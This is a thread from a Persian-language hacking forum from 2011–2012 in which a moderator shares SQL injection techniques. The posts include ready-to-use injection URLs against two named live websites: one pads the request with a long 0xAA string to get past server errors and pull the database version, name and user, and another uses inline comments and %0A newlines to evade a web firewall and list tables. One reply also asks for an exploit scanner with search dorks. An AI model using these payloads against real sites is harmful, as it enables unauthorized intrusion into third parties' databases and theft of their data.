IT Security Team  
قدیمی 06-28-2011, 11:17 AM   #31
مديريت بخش
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
پیش فرض استفاده از Buffer Overflow در Sql Injection

با سلام

به نکته جالبی در مورد استفاده از Buffer Overflow در Sql Injection برخوردم که گفتم برای دوستان بذارم.
گاهی اوقات با زدن Injection برنامه خطای 500 میده برای نمونه لینک زیر که جواب نمیده:

کد:
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6--+-
در این جور مواقع میشه به روش زیر جواب گرفت: (تعداد کارکترهای A بیش از 1000 تا هست)
کد:
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6--+-

با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
The Following 5 Users Say Thank You to firemaker For This Useful Post:
agent_12 (06-29-2011), Black7Hole (08-18-2011), good_boy (12-10-2011), homay (06-30-2011), __SENATOR__ (06-30-2011)
قدیمی 06-29-2011, 12:00 PM   #32
عضو جديد
 
agent_12 آواتار ها
 
تاریخ عضویت: Jan 2011
نوشته ها: 67
Thanks: 56
Thanked 44 Times in 27 Posts
agent_12 به Yahoo ارسال پیام
پیش فرض

نقل قول:
نوشته اصلی توسط firemaker نمایش پست ها
با سلام

به نکته جالبی در مورد استفاده از Buffer Overflow در Sql Injection برخوردم که گفتم برای دوستان بذارم.

با تشکر

سلام...
کسی میتونه این رو یه خرده توضیح بده؟؟؟ من تاحالا به همچین چیزی بر نخوردم....
__________________
“ If I had eight hours to chop down a tree, I’d spend the first six of them sharpening my axe ”

Abraham Lincoln
agent_12 آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-29-2011, 05:01 AM   #33
عضو جديد
 
musty33025 آواتار ها
 
تاریخ عضویت: Jul 2011
نوشته ها: 6
Thanks: 0
Thanked 0 Times in 0 Posts
پیش فرض

I need a new XCXcodeXploit Scanner with the 2010 dorks in it.
musty33025 آنلاین نیست.   پاسخ با نقل قول
قدیمی 08-15-2011, 12:55 PM   #34
مديريت بخش
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
پیش فرض Video for Sql Injection

با سلام
یه فیلم خوب در مورد آموزش Sql Injection دیدم که به نظرم خیلی جالب اومد که گفتم برای دوستان لینکشو بذارم. تو این فیلم مراحل کار رو خیلی خوب توضیح میده البته همه دوستان خودشون استادن.

Link:

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to firemaker For This Useful Post:
p3jm0n (08-15-2011)
قدیمی 10-01-2011, 12:13 AM   #35
عضو جديد
 
Chino آواتار ها
 
تاریخ عضویت: Sep 2011
نوشته ها: 1
Thanks: 0
Thanked 0 Times in 0 Posts
پیش فرض

ADD Me
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
Chino آنلاین نیست.   پاسخ با نقل قول
قدیمی 12-05-2011, 05:45 PM   #36
عضو جديد
 
sepideh آواتار ها
 
تاریخ عضویت: Dec 2011
نوشته ها: 1
Thanks: 0
Thanked 0 Times in 0 Posts
پیش فرض

من نمیتونم این کد را ببینم فقط
500 - Internt serverfel.
Ett problem har uppstått med resursen som du söker efter, och därför går det inte att visa den.
نمایش داده میشه
sepideh آنلاین نیست.   پاسخ با نقل قول
قدیمی 03-10-2012, 10:27 AM   #37
مديريت بخش
 
firemaker آواتار ها
 
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
پیش فرض روش Bypass

با سلام

در لینک زیر یه SQL Injection وجود داره که برای Bypass فایروال از /* .... !*/ و 0A% (به جای Enter) استفاده شده است.

کد:
http://lin.bihac.org/index.php?details=-941%0Aunion%0Aselect%0A1,/*!concat%28/*!table_name*/%29,3,4,5%0Afrom%0A/*!information_schema*/./*!tables*/%0A/*!where*/%0Atable_schema=database%28%29+limit+0,1--

با تشکر
firemaker آنلاین نیست.   پاسخ با نقل قول
پاسخ

برچسب ها
detection, mysql, oracle, sql injection, sql server, table, چک نمودن, ورودی, یافتن, گام به گام, آموزش, اینجکشن, اطلاعات, تارگت, ستون

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال



اکنون ساعت 09:20 PM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.